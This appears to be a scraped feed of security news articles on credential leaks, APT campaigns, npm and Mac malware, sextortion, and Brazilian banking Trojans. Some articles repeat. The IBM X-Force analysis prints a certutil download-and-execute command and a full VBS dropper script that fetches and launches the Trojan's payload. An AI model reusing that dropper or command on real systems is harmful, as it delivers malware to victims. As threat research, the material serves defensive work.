Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, existing vulnerabilities across the world. These unique indicators allow to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents GIB-CERT experts contacted official CERTs in more than 30 countries and notified local incident response teams about data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.



Security Affairs

Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro),Switzerland (admin.ch), the websites of Italian Ministry of Defense (difesa.it), Israel Defense Forces(idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge),Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italyand many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total Group-IB Threat Intelligence system has detected more than 40 000 comprised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers, keyloggers, such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from a malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from configuration files, databases, secret storages of more than 70 programs on the victim’s computer and then sends stolen information to cyber criminals’ C&C server. Another Trojan-stealer — AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallets data. Qbot worm gathers login credentials through use of keylogger, steals cookie files and certificates, active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin,head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks:  when, where and how exactly your data was compromised”.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, existing vulnerabilities across the world. These unique indicators allow to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents GIB-CERT experts contacted official CERTs in more than 30 countries and notified local incident response teams about data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.

Security Affairs: Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept

The Seedworm APT Group has targeted more than 130 victims in 30 organizations since September including NGOs, oil and gas, and telecom businesses.

According to a new research conducted from Symantec’s DeepSight Managed Adversary and ThreatIntelligence (MATI) team, the Seedworm APT group, aka MuddyWater, is rapidly evolving and extended its targets to the telecom, IT services, and oil and gas industries.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

In September 2018, experts from Symantec found evidence of Seedworm and the espionage group APT28 on a computer in the Brazil-based embassy of an oil-producing nation. 

“We not only found the initial entry point, but we were able to follow Seedworm’s subsequent activity after the initial infection due to the vast telemetry Symantec has access to via its Global Intelligence Network. Because of this unique visibility, our analysts were able to trace what actions Seedworm took after they got into a network.”

“Seeing two active groups piqued our interest and, as we began pulling on that one string, we found more clues that led us to uncover new information about Seedworm.” reads the analysis published by Symantec.

The experts were able to gather further information on the group, of the 131 victims hit from mid-September to late November 2018, 39% were in Pakistan,14% in Turkey, 8% in Russia, and 5% in Saudi Arabia.

Most of the targets were in the telecommunications and IT services sectors.

Seedworm

Experts believe that the Seedworm APT is focused on telecommunications and IT services because they are interested in gaining access to customers of those firms. Changing Tools and Techniques

Seedworm threat actors regularly adopt new tactics, techniques and tools to remain under the radar. 

In recent campaigns, the cyber espionage group used new variants of their Powermud backdoor, a new backdoor (Powermuddy), and some custom tools designed to steal passwords, create reverse shells, escalate privilege, and use of the native Windows cabinet creation tool.

“We found new variants of the Powermud backdoor, a new backdoor (Backdoor.Powemuddy), and custom tools for stealing passwords, creating reverse shells, privilege escalation, and the use of the native Windows cabinet creation tool, makecab.exe, probably for compressing stolen data to be uploaded.” continues the analysis.

“The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location.”

Once compromised a machine with its backdoors, threat actors deploy a tool to steal passwords saved in browsers, email accounts, social media, and chat access.

Attackers are very agile, they also used publicly available tools to quickly update operations.

Unlike other APT groups that adopt custom malware for each campaign, Seedworm threat actors were more focused on the ability to quickly adapt their action to the specific circumstance. 

According to Symantec, there is evidence of Seedworm following the people who are analyzing their activities.

Further details, including IoCs are reported in the report published by Symantec.

Pierluigi Paganini

(Security Affairs –Seedworm , APT)

The post Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept appeared first on Security Affairs.



Security Affairs

Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept

The Seedworm APT Group has targeted more than 130 victims in 30 organizations since September including NGOs, oil and gas, and telecom businesses.

According to a new research conducted from Symantec’s DeepSight Managed Adversary and ThreatIntelligence (MATI) team, the Seedworm APT group, aka MuddyWater, is rapidly evolving and extended its targets to the telecom, IT services, and oil and gas industries.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

In September 2018, experts from Symantec found evidence of Seedworm and the espionage group APT28 on a computer in the Brazil-based embassy of an oil-producing nation. 

“We not only found the initial entry point, but we were able to follow Seedworm’s subsequent activity after the initial infection due to the vast telemetry Symantec has access to via its Global Intelligence Network. Because of this unique visibility, our analysts were able to trace what actions Seedworm took after they got into a network.”

“Seeing two active groups piqued our interest and, as we began pulling on that one string, we found more clues that led us to uncover new information about Seedworm.” reads the analysis published by Symantec.

The experts were able to gather further information on the group, of the 131 victims hit from mid-September to late November 2018, 39% were in Pakistan,14% in Turkey, 8% in Russia, and 5% in Saudi Arabia.

Most of the targets were in the telecommunications and IT services sectors.

Seedworm

Experts believe that the Seedworm APT is focused on telecommunications and IT services because they are interested in gaining access to customers of those firms. Changing Tools and Techniques

Seedworm threat actors regularly adopt new tactics, techniques and tools to remain under the radar. 

In recent campaigns, the cyber espionage group used new variants of their Powermud backdoor, a new backdoor (Powermuddy), and some custom tools designed to steal passwords, create reverse shells, escalate privilege, and use of the native Windows cabinet creation tool.

“We found new variants of the Powermud backdoor, a new backdoor (Backdoor.Powemuddy), and custom tools for stealing passwords, creating reverse shells, privilege escalation, and the use of the native Windows cabinet creation tool, makecab.exe, probably for compressing stolen data to be uploaded.” continues the analysis.

“The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control (C&C) location.”

Once compromised a machine with its backdoors, threat actors deploy a tool to steal passwords saved in browsers, email accounts, social media, and chat access.

Attackers are very agile, they also used publicly available tools to quickly update operations.

Unlike other APT groups that adopt custom malware for each campaign, Seedworm threat actors were more focused on the ability to quickly adapt their action to the specific circumstance. 

According to Symantec, there is evidence of Seedworm following the people who are analyzing their activities.

Further details, including IoCs are reported in the report published by Symantec.

Pierluigi Paganini

(Security Affairs –Seedworm , APT)

The post Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept appeared first on Security Affairs.

Popular JavaScript Library for Node.JS Infected With Malware to Empty Bitcoin Wallets

A version of a popular JavaScript library for Node.js contained malicious code for several months that enabled digital attackers to access users’ bitcoin wallets.

At the end of November, GitHub user Ayrton Sparling (aka FallingSnow) reported that someone had added malicious code to EventStream, a toolkit for Node.js that makes it easier for developers to create and work with data streams. The code became active in September when right9ctrl, the new owner of the library, published version 3.3.6 of EventStream. This version came with a dependency called flatmap-stream, which contained the malware.

The creator of flatmap-stream designed the module to steal bitcoin from Copay wallets, a wallet app designed by BitPay. The module then used Node Package Manager (NPM) to transfer the stolen bitcoins to a server located in Kuala Lumpur, Malaysia. NPM has since removed the backdoor.

According to Trend Micro, millions of developers downloaded the malicious code, since the module’s use of encryption enabled flatmap-stream to go undetected for more than two months.

Attacks Against Bitcoin Wallets on the Rise

Digital attackers aren’t new to the idea of stealing bitcoins out of users’ wallets. As reported by Carbon Black, these heists contributed to the loss of $1.1 billion in bitcoin during the first five months of 2018.

Some bad actors have also made a lot of money emptying cryptocurrency wallets. For instance, CoinDesk reported an attack that stole $78 million worth of bitcoin from the wallets of NiceHash, a cryptocurrency mining marketplace. News of this attack came less than a year after Cisco Talos uncovered CoinHoarder, a threat group that netted $50 million in three years by phishing blockchain.info users for access to their wallets.

How to Protect Against Cryptocurrency-Related Threats

Security professionals can help protect against bitcoin-related threats by training employees not to open suspicious emails designed to steal their credentials for cryptocurrency wallets and other accounts. They should also develop an endpoint security strategy built around artificial intelligence (AI) and machine learning to help defend against threats like crypto-mining malware.

Sources: Trend Micro, Carbon Black, CoinDesk, Cisco Talos

The post Popular JavaScript Library for Node.JS Infected With Malware to Empty Bitcoin Wallets appeared first on Security Intelligence.

Security Affairs: A new Mac malware combines a backdoor and a crypto-miner

Experts from Malwarebytes discovered a new strain of Mac malware, tracked as DarthMiner, that is a combination of two open-source programs. 

Experts from Malwarebytes discovered a new piece of Mac malware, tracked as DarthMiner, that is the combination of two open source tools.

The malware is distributed through Adobe Zii, an application supposedly helps in the piracy of various Adobe programs. In this case, attackers used a fake Adobe Zii software that was definitely not the real thing.

“Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.” reads the analysis published by MalwareBytes.

“The malware was being distributed through an application named Adobe Zii.”

The fake Adobe Zii application was developed to run a shell script that downloads and executes a Python script, and then downloads and runs an app named sample.app, that appears to be a version of Adobe Zii, most likely to appear as a harmless application. 

The Python script looks for the presence of Little Snitch, a commonly-used outgoing firewall, and halt the infection process if it is present.

Then the script opens a connection to an EmPyre backend that send arbitrary commands to a compromised Mac. Next, the backdoor downloads a script that fetches and installs the other components of the malware. The malware creates a launch agent named com.proxy.initialize.plist that keeps the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The malicious code also installs the XMRig cryptominer and creates a launch agent for it. 

The analysis of the code revealed another interesting feature, the code to download and install a root certificate for the mitmproxy tool.

“Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.” continues the analysis.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis,

“Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free,” Malwarebytes concludes.

Pierluigi Paganini

(Security Affairs – Mac malware, backdoor)

The post A new Mac malware combines a backdoor and a crypto-miner appeared first on Security Affairs.



Security Affairs

A new Mac malware combines a backdoor and a crypto-miner

Experts from Malwarebytes discovered a new strain of Mac malware, tracked as DarthMiner, that is a combination of two open-source programs. 

Experts from Malwarebytes discovered a new piece of Mac malware, tracked as DarthMiner, that is the combination of two open source tools.

The malware is distributed through Adobe Zii, an application supposedly helps in the piracy of various Adobe programs. In this case, attackers used a fake Adobe Zii software that was definitely not the real thing.

“Earlier this week, we discovered a new piece of Mac malware that is combining two different open-source tools—the EmPyre backdoor and the XMRig cryptominer—for the purpose of evil.” reads the analysis published by MalwareBytes.

“The malware was being distributed through an application named Adobe Zii.”

The fake Adobe Zii application was developed to run a shell script that downloads and executes a Python script, and then downloads and runs an app named sample.app, that appears to be a version of Adobe Zii, most likely to appear as a harmless application. 

The Python script looks for the presence of Little Snitch, a commonly-used outgoing firewall, and halt the infection process if it is present.

Then the script opens a connection to an EmPyre backend that send arbitrary commands to a compromised Mac. Next, the backdoor downloads a script that fetches and installs the other components of the malware. The malware creates a launch agent named com.proxy.initialize.plist that keeps the backdoor open persistently by running exactly the same obfuscated Python script mentioned previously.

The malicious code also installs the XMRig cryptominer and creates a launch agent for it. 

The analysis of the code revealed another interesting feature, the code to download and install a root certificate for the mitmproxy tool.

“Interestingly, there’s code in that script to download and install a root certificate associated with the mitmproxy software, which is software capable of intercepting all web traffic, including (with the aid of the certificate) encrypted “https” traffic. However, that code was commented out, indicating it was not active.” continues the analysis.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis,

“Please, in the future, do yourself a favor and don’t pirate software. The costs can be far higher than purchasing the software you’re trying to get for free,” Malwarebytes concludes.

Pierluigi Paganini

(Security Affairs – Mac malware, backdoor)

The post A new Mac malware combines a backdoor and a crypto-miner appeared first on Security Affairs.

Latest Malware Strains Target Cloudera Hadoop for Bitcoin Mining and DDoS Attacks

­­

Security researchers discovered that several new malware strains are targeting known Cloudera Hadoop vulnerabilities.

The malware variants, including XBash and DemonBot, target Hadoop clusters that are connected to the internet and do not use Kerberos authentication, according to Cloudera. This can lead to certain exploits such as bitcoin mining and distributed denial-of-service (DDoS) attacks, which can create significant negative performance impacts within client environments.

These vulnerability attacks can occur when your Cloudera Hadoop system is not properly configured and secured. For example, when Kerberos is not enabled clusterwide, your Hadoop clusters become yet another possible attack vector.

The good news is that the attack techniques in question are not sophisticated and utilize known exploits, meaning organizations can protect themselves by taking the right precautions.

Protect Yourself With Strong Kerberos Authentication

Countering such attacks requires the use of strong Kerberos authentication to identify the right access for privileged users. Without proper Kerberos authentication, any user can connect to Hadoop clusters, access the system and make bad choices.

To follow best practices, implement additional authentication steps to secure your Cloudera Hadoop clusters, including the following:

  • Secure default accounts and passwords.
  • Utilize Lightweight Directory Access Protocol (LDAP) authentication for Cloudera Manager.
  • Enable Sentry service using Kerberos.
  • Use a secure protocol such as Secure Sockets Layer (SSL) or Transport Layer Security (TLS).
  • Secure default ports.

How do you know whether or not your environment is at risk to begin with? That’s where vulnerability scans come into play.

How to Identify if Your Cloudera Hadoop Clusters Are Affected

Vulnerability assessment solutions for Cloudera Hadoop can provide critical insight into your environment to help mitigate potential attacks. Advanced tools offer security checks and hardening rules to help customers secure their Hadoop clusters, provide rules to help identify Hadoop-specific vulnerabilities, and list detailed recommendations to fix and resolve the vulnerabilities.

To use vulnerability assessment tests to check whether a Cloudera authentication parameter is appropriately set to Kerberos — which is strongly recommended by Cloudera — an organization should take the following steps:

  1. Leverage a vulnerability assessment solution to run the following test: “Authentication method set to Kerberos.”
  2. If a cluster is properly configured, it will pass the test. Multiple systems can be connected to check for this test and get visibility into configuration statuses in minutes.
  3. After running the tests, organizations should attend to the clusters that did not pass. Note that such vulnerabilities can only be addressed with proper configuration, not by simply applying the latest security patches.
  4. Once the configurations have been updated and all nodes authenticate using Kerberos, the problem will be resolved.

As these recent attacks illustrate, vulnerability assessment is a critical piece of any comprehensive data protection program. Last year alone, more than 2 billion records were exposed due to misconfigurations — a number that could have been drastically reduced if teams had been leveraging vulnerability scanning tools.

Source: Cloudera

The post Latest Malware Strains Target Cloudera Hadoop for Bitcoin Mining and DDoS Attacks appeared first on Security Intelligence.

Supply chain compromise: Adding undetectable hardware Trojans to integrated circuits

Is it possible for attackers to equip integrated circuits with hardware Trojans that will not change the area or power consumption of the IC, making them thus indiscernible through power-based post fabrication analysis? A group of researchers from the National University of Sciences and Technology (Islamabad, Pakistan), the Vienna University of Technology and New York University have proven it is. They have also demonstrated that hardware Trojans (HTs) can be implanted not only by adding … More

The post Supply chain compromise: Adding undetectable hardware Trojans to integrated circuits appeared first on Help Net Security.

The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime

In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.

Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.

Compromising Brazilian Users One Remote Session at a Time

IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.

Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.

The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.

Read the white paper: Preserving trust in digital financial services

Rising Interest in Cryptocurrency

Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.

Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.

A Typical Infection Routine

A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:

  1. The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
  2. The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
  3. The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
  4. The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
  5. The VBS script executes the malware, infecting the device.
  6. Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
  7. After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
  8. The malicious DLL component gives the malware its remote control capabilities.

Zooming In on the Malicious LNK File

A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.

First, the malicious script is downloaded from the remote server under the name “tudodebom”:

“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt
  • -urlcache displays or deletes URL cache entries.
  • -split -f forces fetching of a specific URL and updating of the cache.

Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs”:

“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs

The LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (.vbs) from a remote host:

hXXps://remoteserver/turbulencianoar/tudodebom.txt

Lastly, the malware executes the malicious VBS script.

Examining the VBS Script

The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:

“C:\AV product_” + RandomName + “\”

After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.

Interesting elements in this routine include:

  • The use of legitimate remote servers to host attack tools;
  • The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
  • The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.

Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:

Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll

Set objShell = CreateObject( “WScript.Shell” )

ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”

randname = getrandomstring()

exerandom = “AV product.SystrayStartTrigger-” + randname

filezip = “AuZwaaU.zip”

deffolder = “C:\AV product_” + randname + “\”

filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”

fileexe = “AuZwaaU.exe”

filedll = “AuZwaaU.sys”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(filesuccess)) Then

WScript.Quit

End If

If not (objFSO.FileExists(filezip)) Then

Set objFile = objFSO.CreateTextFile(filesuccess, True)

objFile.Write ” ”

objFile.Close

‘WScript.Echo msg

dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)

dim bStrm: Set bStrm = createobject(“Adodb.Stream”)

xHttp.Open “GET”, ubase, False

xHttp.Send

with bStrm

.type = 1

.open

.write xHttp.responseBody

.savetofile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip, 2

end with

WScript.Sleep 5000

set objShellApp = CreateObject(“Shell.Application”)

set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip).items

objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”)).CopyHere(FilesInZip)

WScript.Sleep 5000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip

objFSO.CreateFolder deffolder

WScript.Sleep 3000

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & fileexe, deffolder & exerandom & “.exe”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filedll, deffolder & “AV product.OE.NativeCore.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcp120.sys”, deffolder & “msvcp120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcr120.sys”, deffolder & “msvcr120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\LOG”, deffolder & “LOG”

WScript.Sleep 5000

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

Set objShell = CreateObject( “WScript.Shell” )

outFile = objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objFile = objFSO.CreateTextFile(outFile,True)

objFile.Write “@echo off” & vbCrLf

objFile.Write “@cd ” & deffolder & vbCrLf

objFile.Write “start ” & exerandom & “.exe” & vbCrLf

objFile.Close

objShell.Exec(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”)

WScript.Sleep 10000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objShell = Nothing

Set objFSO = Nothing

Set objShellApp = Nothing

End If

Function getrandomstring()

Dim intMax, k, intValue, strChar, strName

Const Chars = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

intMax = 6

Randomize()

strName = “”

For k = 1 To intMax

intValue = Fix(62 * Rnd())

strChar = Mid(Chars, intValue + 1, 1)

Randomize()

intValue = Fix(62 * Rnd())

strChar = strChar & Mid(Chars, intValue + 1, 1)

strName = strName & strChar

If (k < 6) Then

strName = strName & “”

End If

Next

getrandomstring = strName

End Function

Remote Overlay Images

Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.

To accomplish this goal, the threat actors have created a number of overlays to match platforms used in Brazil (we have censored the platform’s logo below). In each case, the attackers prompt the user to verify his or her email address and identity and confirms the user’s security with a fresh one-time password from their tokenization method.

Brazilian remote overlay Trojan

Figure 1: Fake overlay screen asks users to provide information about their identity.

Remote Overlay Brazilian Malware is after cryptocurrency

Figure 2: Fake overlay screen asks users to submit a token code.

Overlays for 2FA requests match the targeted platform’s preference of user authentication elements and include single sign-on (SSO) from email and social accounts:

Brazilian Remote Overlay Malware Asks for SSO

Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.

Mitigate Financial Cybercrime Risks

Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high for campaigns due to the large number of users affected by each attack, the risks can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.

Read the white paper: Preserving trust in digital financial services

The post The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime appeared first on Security Intelligence.

Alemania propone unas normas para la seguridad de los routers

El gobierno alemán ha publicado un borrador inicial con reglas para la seguridad de routers domésticos y de pequeñas oficinas (SOHO). Este se ha creado en colaboración con fabricantes,  empresas de telecomunicaciones y la comunidad alemana del hardware. Una vez que se apruebe, los fabricantes de routers no tendrán que acatarlo, pero si lo hacen, […]

Sextortion Scams At a Rise Yet Again; Now Leading To Ransomware



In the recent times the sextortion email scams have been at a high rise as they have proved time and time again to being quite a significant and effective method for producing easy money for the hoodlums. A sextortion scam is basically when an individual receives an email stating that they have been spied upon while they were browsing adult websites.

The sextortion campaign which traps recipients into installing the Azorult data stealing Trojan, then further downloading and installing the GandCrab ransomware is in the highlight now.

The first infection, Azorult, will be utilized to steal data from the user's PC, for example, account logins, cookies, documents, chat history, and that's just the beginning. At that point it installs the GandCrab Ransomware, which will encrypt the computer's information.

There have been numerous cases of such scams being accounted for generally where the emails may likewise contain passwords of the users that were leaked amid information breaches so as to make the scams look progressively genuine.

Experts at ProofPoint detected another campaign that as opposed to containing a bitcoin addresses to send a blackmail payment to prompts the user to download a video they made of them indulging in certain "exercises". The downloaded compress document, however, contains an executable that will further install the malware onto the computer.

"However, this week Proofpoint researchers observed a sextortion campaign that also included URLs linking to AZORult stealer that ultimately led to infection with GandCrab ransomware," stated ProofPoint's research.

The downloaded documents will be named like Foto_Client89661_01.zip and the full text of the sextortion trick email is below:




This new strategy is turned out to be significantly hazardous, as when the recipients are already terrified with the need to affirm if a video exists. They download the document, endeavor to open the compressed file, and thusly find themselves infected with two distinct sorts of malware.

Consequently, it is recommended for the user's to not believe anything they receive via email from a strange address and rather do a few inquiries on the Web to check whether others have experienced emails this way or not.

22 malware infected apps on Play Store found draining phone’s battery

By Waqas

Another day, another malware targeting Android users – This time, 22 apps have been removed from the Play Store after security researchers found malware draining user phone’s battery and also downloading files without their consent. These Android apps disguised themselves as legitimate software and in some cases even offered some functionality. The most popular of […]

This is a post from HackRead.com Read the original post: 22 malware infected apps on Play Store found draining phone’s battery

SNAKEMACKEREL Group Uses Brexit-Themed Spear Phishing Attack to Target Government Agencies

Analysts discovered a new campaign from the SNAKEMACKEREL group that uses fake Brexit-related documents to infiltrate major government agencies and steal information.

Researchers with Accenture noted that SNAKEMACKEREL, which is also known by several other names including Sofacy, is an espionage-motivated collective of cybercriminals with a history of launching malware attacks on public sector organizations across North America and the European Union.

In the recent campaign, victims were lured in with a spear phishing attack to open documents containing the malicious macros, which then activated a form of malware that has multiple names, including Zebrocy and Zekapab. Agencies targeted in the campaign included the U.K. Defence Science and Technology Laboratory, the U.K Foreign and Commonwealth Office, and the Organisation for the Prohibition of Chemical Weapons.

How SNAKEMACKEREL Capitalizes on Current Events

The files containing the malware were sent the same day U.K. Prime Minister Theresa May signed the draft agreement that would signal the country’s departure as a member of the European Union, a decision colloquially known as Brexit. When victims received the fake documents, however, they saw a series of jumbled text that suggests they were created with an earlier version of Microsoft Word. This tricked victims into clicking on the macros containing the malware.

Components within the macro include an executable binary similar in nature to code used in attacks attributed to Sofacy earlier this year. Once Zekapab has infected a victim’s system, it sends HTTP POST requests to deliver information it has collected back to threat actors, while another component can spread the malware even further across a network.

Researchers said SNAKEMACKEREL has also been used to target organizations outside of the U.K., including the North Atlantic Treaty Organization (NATO), the International Olympic Committee and defense contractors, among others.

Avoid the Threat of Spear Phishing Attack Campaigns

